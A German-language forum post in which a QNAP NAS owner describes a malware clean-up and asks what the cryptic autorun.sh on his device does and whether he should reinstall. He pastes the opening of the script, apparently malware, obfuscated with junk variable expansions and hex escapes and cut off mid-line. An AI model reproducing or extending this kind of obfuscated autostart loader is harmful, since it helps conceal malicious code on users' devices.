Hallo,
nach Hinweis auf entfernte Malware MR2101 MR2104 bei meinem QNAP NAS TS-251 Version 5.0.0 1853 habe ich zusätzlich zum Virenscanner und dem Malware remover noch den security advisor installiert und zahlreiche Verbesserungen der Sicherheit ausgeführt, u.a. die Ausführung der autorun.sh ausgeschaltet.
Mit Hilfe des Security Advisors habe ich Stufe mittlere Sicherheit umgesetzt, Antivirus meldet nichts und malware remover meldet nichts mehr.
Auf oom_reaper habe ich überprüft - die PID liegt bei 5xx, also unter 1.000, womit es dann wohl NICHT der bitcoin-miner ist.
Mehrere Neustarts, mehrere Scans.
Der kryptische Inhalt der autorun.sh (die ich nie selbst bearbeitet habe) macht mich aber stutzig - handelt es sich hier um ein Ergebnis der Malware?
Lässt sich feststellen, was hier ausgeführt worden ist / werden sollte?
Hier der Inhalt:
#!/bin/sh
unse${oYNLJVti}t; tes${KGJzI}t; ev${PHsnCYuoayMM}al${TITBRmxJDk}; fals${pTiVbAxEUNgwqq}e; ${KepfxcadRSdg}false; tes$yfidgUO$""t; ty${KmPqAdkoYABa}p${dDXdtVanluPuK}e; tru$'\x65'${XqByLP}${GmzkqA}; $ElbaMNUuFaZBThz$''fa${KtxNJoPDEFHn}lse; tes$tCwdiyUFDoMZHg$""${nqlFkt}t; f${oCkxoBfm}alse; te${FGxvVAwAAxl}s${iBVhJeKFa}t; ${XXgPIMlCQK}${vTxymzYqKCXNH}true${olNb}; ${KXsqqVizjekpF}test${CyjaItplrtyAdDF}; ty$UPmNE$""${MtjegRTa}pe; test${cdlPUQ}; fals${UwdbwuGIumJnGC}e; DMirPGwW=${gmQNblLSUsjsad}$wHPZcAKYx$''tr
Zuletzt die Frage: ist es noch notwendig oder ratsam, das NAS "platt zu machen" und neu aufzusetzen oder kann ich weiter damit arbeiten?
Vielen Dank für eure Hilfe und bitte entschuldigt, wenn die Frage hier nicht an der richtigen Stelle ist oder nicht richtig formuliert. Ich bin neu hier. Gerne gebe ich noch weitere Infos.
Raimund